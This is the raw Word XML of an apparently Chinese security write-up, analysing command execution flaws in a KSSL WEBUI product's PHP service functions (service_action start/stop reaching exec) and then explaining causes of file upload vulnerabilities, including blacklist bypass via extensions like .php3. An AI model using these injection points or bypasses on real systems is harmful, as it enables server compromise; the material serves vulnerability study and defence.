                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="50"/>
                      <w:ind w:left="183" w:right="50"/>
                      <w:rPr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或者进行了错误配置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" )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;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112"/>
                      <w:ind w:left="2014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false;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="1097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3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stop_service( $service_path )</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="183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4" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="1097" w:right="3102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global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$SSL_DIR; global $PMONITOR_DIR;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="1097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WEBUI_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exec(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color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$PMONITOR_DIR/bin/PMonitor</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-9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--kill</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="183" w:right="25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-f $SSL_DIR/cfg/".$service_path."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/PMonitor.conf",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true )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;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="183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183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status_service( $service_path )</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="183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1097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global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$PMONITOR_DIR;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="4"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="19"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="1097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exec(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"$PMONITOR_DIR/bin/PMonitor -l | grep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\"HRP_$service_path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\"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|</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-7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awk</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-7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-F=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'{print</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-7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$3}'",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$results,</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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ret )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;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="2014" w:right="2861" w:hanging="917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switch(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$results[0] ) { case "":</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="215" w:lineRule="exact"/>
                      <w:ind w:left="2931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已停止</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112"/>
                      <w:ind w:left="2014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case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"NORMAL":</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="62" w:line="338" w:lineRule="auto"/>
                      <w:ind w:left="2014" w:right="1994" w:firstLine="916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已启动</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>"; case "INIT":</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="44"/>
                      <w:ind w:left="2014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case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"RETRYING":</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="65"/>
                      <w:ind w:left="2931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启动中</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112"/>
                      <w:ind w:left="1097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3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6"/>
        <w:spacing w:before="76"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> status_service </w:t>
      </w:r>
      <w:r>
        <w:t>函数中命令有双引号保护，双引号被转义，导致</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>利用失败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6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9285" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:20.3pt;width:337.5pt;height:344.25pt;z-index:426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微软雅黑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63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WEBUI_exec( $cmd, $show_err = false, $note = '' )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095" w:right="2140"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exec(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $cmd, $results, $ret ); if( $ret != 0 ) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="211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 xml:space="preserve"> $show_err ) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65" w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$err = '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>执行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color w:val="333333"/>
                    </w:rPr>
                    <w:t>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 xml:space="preserve">cmd.' </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>命令失败</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'; foreach ( $results as</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="42"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$err_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>line )</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>//2007-5-8 yanhm bugfix for 0005289</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>错误信息太多</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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color w:val="333333"/>
                    </w:rPr>
                    <w:t>+{{</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="3843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错误信息中删去命令帮助信</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="18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color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t>息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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-59"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>strncmp($err_line,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"Usage", 5</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>) !</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>= 0 )</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:right="1260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break</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95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//}}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$err = $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>err.',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'.$</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>err_line;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t>文件</w:t>
      </w:r>
      <w:r>
        <w:t>/kssl/kssl/WEBUI/www/global/common.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:p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231"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s9284" type="#_x0000_t202" style="width:337.5pt;height:132.3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928" w:right="50"/>
                  </w:pPr>
                  <w:bookmarkStart w:id="44" w:name="文件上传漏洞"/>
                  <w:bookmarkStart w:id="45" w:name="_bookmark21"/>
                  <w:bookmarkEnd w:id="44"/>
                  <w:bookmarkEnd w:id="45"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>WEBUI_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>alert(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "$note:$err" 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false;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true;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4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14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最</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>终进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-78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exec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>致命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">service_action=start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和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service_action=stop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时存在两处命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令执行漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>洞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8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:ind w:right="501" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>在网站的运营过程中，不可避免地要对网站的某些页面或者内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>进行更新，这时便需要使用到网站的文件上传的功能。如果不对被上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>传的文件进行限制或者限制被绕过，该功能便有可能会被利用于上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>可执行文件、脚本到服务器上，进而进一步导致服务器沦陷。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="both"/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777" w:right="1946" w:hanging="36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lastRenderedPageBreak/>
        <w:t>导致文件上传的漏洞的原因较多，主要包括以下几类：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 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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="57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服务器配置不当</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="77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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="56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开源编辑器上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="77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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5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本地文件上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传限制</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="77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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5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过滤不严或被绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="77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 xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="5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文件解析漏洞导致文件执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="77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 xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="56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文件路径截断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="464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服务器配置不当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当服务器配置</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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当时，在不需要上传页面的情况下便可导致任意文件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上传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837" w:right="317" w:hanging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开源编辑器上传漏洞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很多开源的编辑器历史上都有不同的上传漏洞，包括但不只限于</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="345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 xml:space="preserve">CKEditor,CKEditor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="317" w:hanging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本地文件上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传限制</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被绕过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只在客户端浏览器上做了文件限制而没有在远程的服务器上做限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="326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制，只需要修改数据包就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可以轻松绕过限制。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837" w:right="317" w:hanging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过滤不严或被绕过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有些网站上使用了黑名单过滤掉了一些关键的可执行文件脚本后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="2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缀等，但黑名单不全或者被绕过，导致可执行脚本文件被上传到服务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器上，执行。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如在服务器后端过滤掉了后缀为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.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的文件，但并没有过滤掉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.php3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等其他可执行文件脚本后缀，攻击者就可以上传带有其他的可执行文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件脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后缀的恶意文件到服务器上。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</w:rPr>
        <w:t>常用的一些可执行的文件脚本的后缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1024"/>
          <w:tab w:val="left" w:pos="1754"/>
          <w:tab w:val="left" w:pos="2483"/>
          <w:tab w:val="left" w:pos="3215"/>
          <w:tab w:val="left" w:pos="4019"/>
          <w:tab w:val="left" w:pos="4576"/>
          <w:tab w:val="left" w:pos="5241"/>
          <w:tab w:val="left" w:pos="5877"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="415"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>php2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>php3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
